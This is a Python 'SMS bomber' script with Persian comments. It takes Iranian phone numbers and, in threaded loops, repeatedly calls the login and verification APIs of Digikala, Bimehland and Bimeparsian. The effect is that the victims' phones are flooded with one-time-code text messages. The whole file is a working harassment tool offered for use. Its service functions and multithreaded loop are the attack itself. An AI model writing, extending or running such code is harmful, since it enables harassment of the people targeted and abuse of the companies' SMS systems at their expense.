import requests
from bs4 import BeautifulSoup
import re
from re import match, sub
import time
from time import sleep
from threading import Thread
import random
import json
import uuid
import socket
import sys
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
from os import system, name
from platform import node, system, release


try:
    from requests import get, post
except ImportError:
    system("python3 -m pip install requests")


user_agents = [
    "Mozilla/5.0 (iPhone; CPU iPhone OS 16_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Mobile/15E148 Safari/604.1",
    "Mozilla/5.0 (Android 13; Mobile; rv:109.0) Gecko/109.0 Firefox/109.0", 
    "Mozilla/5.0 (Linux; Android 13; SM-G998B) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Mobile Safari/537.36",
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/604.1",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.2 Safari/605.1.15"
]

# رنگ‌ها برای خروجی
r, g, y, a = '\033[31;1m', '\033[32;1m', '\033[33;1m', '\033[0m'

# ==========================
# بررسی اتصال اینترنت
# ==========================
def check_internet():
    try:
        socket.gethostbyname("smtp.gmail.com")
        return True
    except socket.gaierror:
        return False

# ==========================
# اعتبارسنجی شماره‌ها
# ==========================
def is_phone(phone_input: str):
    phones = phone_input.split('-')
    valid_phones = []
    for phone in phones:
        phone = phone.strip()
        if re.match(r"^(?:\+989|989|09|9)\d{9}$", phone):
            valid_phones.append(re.sub(r"^(?:\+989|989|09|9)", "+989", phone))
        else:
            print(f"{r}[-] Invalid Phone: {phone}{a}")
    return valid_phones if valid_phones else False

# ==========================
# تابع ارسال ایمن
# ==========================
def send_service_safe(service, phone):
    try:
        service(phone)
    except Exception as e:
        print(f"{r}[!] {service.__name__} Exception for {phone}: {e}{a}")

# ==========================
# توابع سرویس‌ها
# ==========================

def digikala(phone):
    try:
        res = post("https://api.digikala.com/v1/user/authenticate/", json={"username": "0" + phone.split("+98")[-1]}, timeout=5)
        print(f'{g}(Digikala) {a}Code Sent' if res.status_code == 200 else f'{r}[-] (Digikala) Failed{a}')
        return res.status_code == 200
    except Exception as e:
        print(f'{r}[!] Digikala Exception: {e}{a}')
        return False

def bimehland(phone):
    phone = phone.replace("+98", "0").replace("98", "0", 1) if phone.startswith(("98", "+98")) else phone
    try:
        r = requests.post("https://bimehland.com/MasterApi/VerifyNumber", 
                          json={"mobile": phone, "nCode": None, "sso": ""}, timeout=10)
        print(f"Status: {r.status_code} | Response: {r.text[:200]}")
        return r.ok
    except Exception as e:
        print(f"Error: {e}")
        return False

def bimeparsian(phone):
    phone = '0' + phone.split('+98')[-1].split('98')[-1]
    try:
        r = requests.post("https://bimeparsian.com/MasterApi/VerifyNumber", json={"mobile": phone, "nCode": None, "sso": ""}, timeout=10)
        print(f"Status: {r.status_code} | Response: {r.text or '[empty]'}")
        return r.status_code in [200, 201]
    except Exception as e:
        print(f"Error: {e}")
        return False

        
# ==========================
# لیست سرویس‌ها
# ==========================
services = [
    digikala, bimehland, bimeparsian
]

# ==========================
# تابع VIP مولتی‌تردینگ
# ==========================
def vip(phones, loops, delay):
    print(f"{g}Targets: {y}{', '.join(phones)}{a}")
    print(f"{g}Services Loaded: {y}{len(services)}{a}")
    print(f"{g}Delay: {y}{delay}s{a}")
    try:
        for _ in range(loops):
            for phone in phones:
                for service in services:
                    Thread(target=send_service_safe, args=(service, phone)).start()
                    sleep(delay)
    except KeyboardInterrupt:
        print(f"{g}[+] Mission Completed!{a}")

# ==========================
# منوی اصلی
# ==========================
def main_menu():
    print(f"""
{y}╔════════════════════════════════════════════╗
{g}║         SMS Bomber by M.M.]R               ║
{y}╚════════════════════════════════════════════╝
{g} Coded by: {r}M.M.]R{a}
{y}══════════════════════════════════════════════
{g} Services Loaded: {y}{len(services)}{a}
{g} Enter phone numbers (separated by - for multiple):
{a} Example: +989123456789-+989987654321
{y}══════════════════════════════════════════════
""")

# ==========================
# نقطه ورود
# ==========================
if __name__ == "__main__":
    if not check_internet():
        print(f"{r}[-] No internet connection!{a}")
    else:
        main_menu()
        phones = None
        while not phones:
            phone_input = input(f'{g}[?] Enter Phone(s) (+98): {a}')
            phones = is_phone(phone_input)
            if not phones:
                print(f"{r}[-] No valid phones entered!{a}")
        
        # بخش اصلاح شده برای پرسیدن تعداد و سرعت
        loops = int(input(f'{g}[?] Loops [Default=1]: {a}') or 1)
        delay = float(input(f'{g}[?] Delay (seconds) [Default=0.1]: {a}') or 0.1)
        
        vip(phones, loops, delay)
